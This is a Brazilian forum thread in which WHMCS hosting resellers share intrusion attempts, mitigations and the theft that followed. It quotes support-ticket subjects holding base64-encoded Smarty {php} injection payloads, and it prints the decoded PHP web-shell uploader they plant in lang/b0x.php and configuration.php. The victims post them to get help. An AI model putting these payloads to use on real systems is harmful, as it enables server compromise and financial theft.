Tentativas de invasão em meu WHMCS

[edvan]

Eu acredito que todos os IPs são de proxy, quem iria querer invadir uma empresa do brasil, sendo de outro país? kkk

Clebson,

Aí que você se engana... um cliente meu não tinha aplicado o patch de segurança e um houve uma invasão e o script via debug comprovou que era um código famoso indiano!

[Visitante]

Clebson,

Aí que você se engana... um cliente meu não tinha aplicado o patch de segurança e um houve uma invasão e o script via debug comprovou que era um código famoso indiano!

Assim como o script utilizado pelos brasileiros não são brasileiros, e sim estrangeiros!

[Clebson]

Clebson,

Aí que você se engana... um cliente meu não tinha aplicado o patch de segurança e um houve uma invasão e o script via debug comprovou que era um código famoso indiano!

Pode até ser, mas não faz sentido, por que eles iriam querer invadir empresas do brasil, e não do país deles? Será por diversão?

Mas mesmo assim, continuo com a minha opinião, os códigos não deveriam ser divulgados... rsrs

[Cassiano Teixeira]

Eu coloquei meus departamento de suporte todos sendo necessário login de cliente até a poeira abaixar. Pelo menos parei de receber os tickets com os códigos.

[Enio F.]

Eu fiz a mesma coisa e também acalmou os incômodos.

Eu coloquei meus departamento de suporte todos sendo necessário login de cliente até a poeira abaixar. Pelo menos parei de receber os tickets com os códigos.

[Visitante dessideriojr]

bloqueando os tickets para clientes apenas, quando se manda diretamente pro email, ele cria o ticket normalmente ?

[Cassiano Teixeira]

bloqueando os tickets para clientes apenas, quando se manda diretamente pro email, ele cria o ticket normalmente ?

Não. Basta habilitar a função de permitir tickets apenas na área de clientes.

[Lperez]

No dia 08/12/2011 recebi o código abaixo

Client: xxx xxxx #228

Department: Suporte

Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Priority: Medium

---

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

IP Address: 87.106.140.33

No dia 18/12/2011, Recebi o seguinte código

Client: aasa

Department: Fale Conosco

Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ0pHbGtJRDBnSkY5SFJWUmJKMk50WkNkZE95QnBaaUFvSkdsa0lEMDlKM1Z3SnlrZ2V5QmxZMmh2SUNjOFptOXliU0JoWTNScGIyNDlJaUlnYldWMGFHOWtQU0p3YjNOMElpQmxibU4wZVhCbFBTSnRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhJaUJ1WVcxbFBTSjFjR3h2WVdSbGNpSWdhV1E5SW5Wd2JHOWhaR1Z5SWo0bk95QmxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzZ2FXWW9JQ1JmVUU5VFZGc25YM1Z3YkNkZElEMDlJQ0pWY0d4dllXUWlJQ2tnZXlBSmFXWW9RR052Y0hrb0pGOUdTVXhGVTFzblptbHNaU2RkV3lkMGJYQmZibUZ0WlNkZExDQWtYMFpKVEVWVFd5ZG1hV3hsSjExYkoyNWhiV1VuWFNrcElIc2daV05vYnlBblBHSStWWEJzYjJGa0lGTlZTMU5GVXlBaElTRThMMkkrUEdKeVBqeGljajRuT3lCOUlBbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBnZlNCOUlEOCsiKTsgICRoYW5kbGUgPSBmb3BlbigiY29uZmlndXJhdGlvbi5waHAiLCAiciIpOyAgJG91dHB1dCA9IGZyZWFkKCRoYW5kbGUsIGZpbGVzaXplKCJjb25maWd1cmF0aW9uLnBocCIpKTsgICR3cml0ZSA9ICRvdXRwdXQuJGNvZGU7ICRmbyA9IGZvcGVuKCJjb25maWd1cmF0aW9uLnBocCIsICJ3Iik7ICBmd3JpdGUoJGZvLCR3cml0ZSk7'));{/php}

Priority: Medium

---

saaaaaaaaaaaaa

----------------------------

IP Address: 91.99.108.24

No dia 21 tentei acessar administração do whmcs e a senha não entrava, tive que resetar a senha.

E ontem a coisa fedeu, recebi um email do pagseguro informando que havia feito um pagamento no valor de R$430,00 que eu não havia feito para uma tal pessoa, liguei imediatamente no pagseguro e abri um chamado informando que não fiz esse pagamento.

Mas para minha surpresa, tentei acessar meu email de cadastro do pagseguro e não consegui, tentei acessar o WHM da minha revenda e não consegui, tentei acessar o Moip e não consegui, o camarada trocou todas minhas senhas, a minha sorte foi que no Moip e Pagseguro tenho outras contas de emails cadastradas a acabei recebendo o email de notificação da transação.

Já troquei a senhas de tudo, limpei o diretorio templates_c

Fiz a atualização do arquivo functions.php

Verifiquei o diretório lang e não encontrei nada.

Mas no diretório modules/reports encontrei esse arquivo module_eval_system.php que estava com a data de 08/12/2011

Se alguém quiser eu posto o código do arquivo.

Se alguém puder descodificar os códigos acima, e me informar o que foi alterado em meu whmcs, ficaria muito grato.

Obrigado!

[Visitante]

No dia 08/12/2011 recebi o código abaixo

Client: xxx xxxx #228

Department: Suporte

Subject: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Decodificado:

$code = base64_decode('<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?> ');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

---

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNtbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0p6eGlQbFZ3Ykc5aFpDQlRWVXRUUlZNZ0lTRWhQQzlpUGp4aWNqNDhZbkkrSnpzZ2ZRMEtaV3h6WlNCN0lHVmphRzhnSnp4aVBsVndiRzloWkNCSFFVZEJUQ0FoSVNFOEwySStQR0p5UGp4aWNqNG5PeUI5RFFwOURRby9QaUE9Jyk7DQokZm8gPSBmb3BlbiAoImxhbmcvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}

Decodificado:

$code = base64_decode('<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?> ');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

-{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ0pHbGtJRDBnSkY5SFJWUmJKMk50WkNkZE95QnBaaUFvSkdsa0lEMDlKM1Z3SnlrZ2V5QmxZMmh2SUNjOFptOXliU0JoWTNScGIyNDlJaUlnYldWMGFHOWtQU0p3YjNOMElpQmxibU4wZVhCbFBTSnRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhJaUJ1WVcxbFBTSjFjR3h2WVdSbGNpSWdhV1E5SW5Wd2JHOWhaR1Z5SWo0bk95QmxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzZ2FXWW9JQ1JmVUU5VFZGc25YM1Z3YkNkZElEMDlJQ0pWY0d4dllXUWlJQ2tnZXlBSmFXWW9RR052Y0hrb0pGOUdTVXhGVTFzblptbHNaU2RkV3lkMGJYQmZibUZ0WlNkZExDQWtYMFpKVEVWVFd5ZG1hV3hsSjExYkoyNWhiV1VuWFNrcElIc2daV05vYnlBblBHSStWWEJzYjJGa0lGTlZTMU5GVXlBaElTRThMMkkrUEdKeVBqeGljajRuT3lCOUlBbGxiSE5sSUhzZ1pXTm9ieUFuUEdJK1ZYQnNiMkZrSUVkQlIwRk1JQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBnZlNCOUlEOCsiKTsgICRoYW5kbGUgPSBmb3BlbigiY29uZmlndXJhdGlvbi5waHAiLCAiciIpOyAgJG91dHB1dCA9IGZyZWFkKCRoYW5kbGUsIGZpbGVzaXplKCJjb25maWd1cmF0aW9uLnBocCIpKTsgICR3cml0ZSA9ICRvdXRwdXQuJGNvZGU7ICRmbyA9IGZvcGVuKCJjb25maWd1cmF0aW9uLnBocCIsICJ3Iik7ICBmd3JpdGUoJGZvLCR3cml0ZSk7'));{/php}

Decodificado:

$code = base64_decode('<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?> ');

$fo = fopen ("lang/b0x.php","w");

fwrite($fo,$code);

[tekobr]

Eu acho que é muita irresponsabilidade usar módulos de pagamento ou módulos que ficam mostrando saldo de MoIP/PagSeguro/etc no WHMCS que precisam gravar sua senha em um arquivo ou BD no seu servidor!!!

Vocês nunca pensaram que isso fosse acontecer?!

A primeira coisa que me veio na cabeça quando vi esses módulos é que seria muito fácil para o invasor sacar o dinheiro!!! Nunca usei e nunca vou usar, é muita irresponsabilidade e certamente quem usa isso não tem capacidade de ser empresário...

#prontofalei